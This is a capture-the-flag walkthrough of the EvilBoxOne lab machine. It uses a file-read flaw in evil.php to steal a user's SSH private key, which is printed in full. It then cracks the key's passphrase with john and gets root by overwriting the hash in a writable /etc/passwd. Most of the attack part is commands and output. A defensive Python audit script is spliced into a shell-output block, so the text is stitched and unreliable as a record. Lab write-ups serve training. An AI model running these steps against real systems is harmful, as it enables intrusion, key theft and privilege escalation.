ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne

Here are the hits:

  • /etc/crontab: default content
  • /etc/fstab: default content
  • /etc/host.conf: default content
  • /etc/ld.so.conf: default content
  • /etc/network/interfaces: default content
  • /etc/networks: useless
  • /etc/passwd
  • /etc/resolv.conf: useless
  • /etc/ssh/sshd_config: default content
  • /etc/ssh/ssh_config: default content
  • /etc/ssh/ssh_host_rsa_key.pub

New details discovered

  • /etc/passwd

    • We now know there is another user, named mowree
  • /etc/ssh/ssh_host_rsa_key.pub

    • An SSH login clue, with the key comment pointing at root@EvilBoxOne

The information is still insufficient, but our new lead is mowree. Let's see whether that user has SSH login material under .ssh. Build a simple SSH guessing wordlist, ssh_dict.txt, modelled on our discovery that /etc/ssh/ssh_host_rsa_key.pub exists

/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/ssh_host_dsa_key
/root/.ssh/ssh_host_dsa_key.pub
/root/.ssh/ssh_host_key
/root/.ssh/ssh_host_key.pub
/root/.ssh/ssh_host_rsa_key
/root/.ssh/ssh_host_rsa_key.pub
/home/mowree/.ssh/authorized_keys
/home/mowree/.ssh/identity
/home/mowree/.ssh/identity.pub
/home/mowree/.ssh/id_dsa
/home/mowree/.ssh/id_dsa.pub
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/id_rsa.pub
/home/mowree/.ssh/ssh_host_dsa_key
/home/mowree/.ssh/ssh_host_dsa_key.pub
/home/mowree/.ssh/ssh_host_key
/home/mowree/.ssh/ssh_host_key.pub
/home/mowree/.ssh/ssh_host_rsa_key
/home/mowree/.ssh/ssh_host_rsa_key.pub
  • Attack script

    for i in $(cat ./ssh_dict.txt);
    do
    echo "输出 >>>$i:";
    curl "http://192.168.56.117/secret/evil.php?command=$i";
    done
    
  • Result

    输出 >>>/root/.ssh/authorized_keys:
    输出 >>>/root/.ssh/identity:
    输出 >>>/root/.ssh/identity.pub:
    输出 >>>/root/.ssh/id_dsa:
    输出 >>>/root/.ssh/id_dsa.pub:
    输出 >>>/root/.ssh/id_rsa:
    输出 >>>/root/.ssh/id_rsa.pub:
    输出 >>>/root/.ssh/ssh_host_dsa_key:
    输出 >>>/root/.ssh/ssh_host_dsa_key.pub:
    输出 >>>/root/.ssh/ssh_host_key:
    输出 >>>/root/.ssh/ssh_host_key.pub:
    输出 >>>/root/.ssh/ssh_host_rsa_key:
    输出 >>>/root/.ssh/ssh_host_rsa_key.pub:
    输出 >>>/home/mowree/.ssh/authorized_keys:
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
    输出 >>>/home/mowree/.ssh/identity:
    输出 >>>/home/mowree/.ssh/identity.pub:
    输出 >>>/home/mowree/.ssh/id_dsa:
    输出 >>>/home/mowree/.ssh/id_dsa.pub:
    输出 >>>/home/mowree/.ssh/id_rsa:
    -----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
    
    uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
    hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
    o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
    +gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
    b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
    HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
    9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
    zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
    rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
    tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
    94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
    VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
    Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
    hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
    Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
    IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
    MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
    62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
    Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
    p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
    pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
    KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
    i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
    4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
    8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
    -----END RSA PRIVATE KEY-----
    输出 >>>/home/mowree/.ssh/id_rsa.pub:
    输出 >>>/home/mowree/.ssh/ssh_host_dsa_key:
    输出 >>>/home/mowree/.ssh/ssh_host_dsa_key.pub:
    输出 >>>/home/mowree/.ssh/ssh_host_key:
    输出 >>>/home/mowree/.ssh/ssh_host_key.pub:
    输出 >>>/home/mowree/.ssh/ssh_host_rsa_key:
    输出 >>>/home/mowree/.ssh/ssh_host_rsa_key.pub:
    

Jackpot:

  • /home/mowree/.ssh/authorized_keys

    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
    
  • /home/mowree/.ssh/id_rsa

    -----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
    
    uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
    hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
    o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
    +gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
    b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
    HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
    9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
    zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
    rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
    tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
    94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
    VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
    Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
    hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
    Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
    IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
    MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
    62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
    Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
    p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
    pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
    KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
    i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
    4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
    8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
    -----END RSA PRIVATE KEY-----
    

We have grabbed mowree's public and private key directly; by stealing the private key we can attack

  • Steal it with this command combination: touch id_rsa && curl "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" > id_rsa && chmod 600 id_rsa

  • Try logging in: ssh mowree@192.168.56.117 -i id_rsa

    • -i specifies the key used for authentication
    ┌──(kali㉿kali)-[~/workspace]
    └─$ ssh mowree@192.168.56.117 -i id_rsa 
    The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
    ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
    This key is not known by any other names
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    nter passphrase for key 'id_rsa': 
    

Logging in requires a passphrase, so let's try cracking it with john

  • First convert the private key into a format john understands: /usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
  • Crack it: john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt. If rockyou.txt is missing, decompress rockyou.txt.gz with sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
┌──(kali㉿kali)-[~/workspace]
└─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt                                                                          1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (./id_rsa)     
1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
  • The result is unicorn
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Login successful; we can move on to the next step

Privilege escalation

Exploring the file system turns up the first flag

mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt 
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

Of course we still need to escalate further and obtain root

  • Check sudo: nothing
  • Check the kernel version: no usable kernel exploit either
  • Check whether there are sensitive files we have write access to with find / -writable 2>/dev/null | grep 'etc', which generally inspects the configuration directory
mowree@EvilBoxOne:~$ find / -writable 2>/dev/null | grep 'etc'
/etc/passwd
  • This file again: /etc/passwd

  • If this file is writable, a user's password can be overwritten outright

  • We pick the password 123 and generate its hash with openssl passwd -1: $1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/

  • Tamper with /etc/passwd

    root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
    
  • Log in with su root

    mowree@EvilBoxOne:~$ su root
    Contraseña: 
    root@EvilBoxOne:/home/mowree# id
    uid=0(root) gid=0(root) grupos=0(root)
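What made this escalation possible is a writable /etc/passwd plus the fact that su and login honour a hash placed in its second field. As an added defender-side check, not part of the original post, this Python script audits a passwd-format file for exactly those conditions: group or world write permission on the file, an inline password hash instead of the x placeholder, an empty password field, and any non-root account with uid 0. The sample file is constructed from the tampered root line shown above plus a few stock entries and is written with mode 0666 as my stand-in for whatever permissions the box had; the function names are mine.

```python
import os
import stat
import tempfile

# Constructed excerpt of the tampered /etc/passwd from this write-up: the root
# line carries the inline hash that was written in, followed by stock entries.
SAMPLE_PASSWD = """\
root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
"""

# Values of the password field that mean "look in /etc/shadow" or "locked".
SHADOWED = {'x', '*', '!', '!!'}


def audit_passwd(path):
    """Return a list of human-readable findings for a passwd-format file."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f'{path} is group/world-writable (mode {stat.S_IMODE(mode):04o})')
    with open(path) as fh:
        for lineno, line in enumerate(fh, 1):
            line = line.rstrip('\n')
            if not line or line.startswith('#'):
                continue
            fields = line.split(':')
            if len(fields) != 7:
                findings.append(f'line {lineno}: malformed entry with {len(fields)} fields')
                continue
            user, pw, uid, _gid, _gecos, _home, _shell = fields
            if pw == '':
                findings.append(f'line {lineno}: {user} has an empty password field')
            elif pw not in SHADOWED:
                # A hash here is honoured by login/su and bypasses /etc/shadow entirely.
                findings.append(f'line {lineno}: {user} has a password hash in passwd')
            if uid == '0' and user != 'root':
                findings.append(f'line {lineno}: {user} has uid 0')
    return findings


def demo():
    """Write the constructed sample with mode 0666 and audit it."""
    fd, path = tempfile.mkstemp(prefix='passwd-')
    with os.fdopen(fd, 'w') as fh:
        fh.write(SAMPLE_PASSWD)
    os.chmod(path, 0o666)
    return audit_passwd(path)


if __name__ == '__main__':
    for finding in demo():
        print(finding)
```

Run against the real file (audit_passwd('/etc/passwd')) from a cron job or a configuration-management check, a clean system produces no findings; the two findings the sample produces, the writable mode and the inline root hash, are precisely the two conditions that turned the earlier file read into a root shell.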
    

Result

root@EvilBoxOne:/home/mowree# ls
user.txt
root@EvilBoxOne:/home/mowree# cat user.txt 
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

GAME OVER

Posted 2022-11-10 20:03 by sha0dow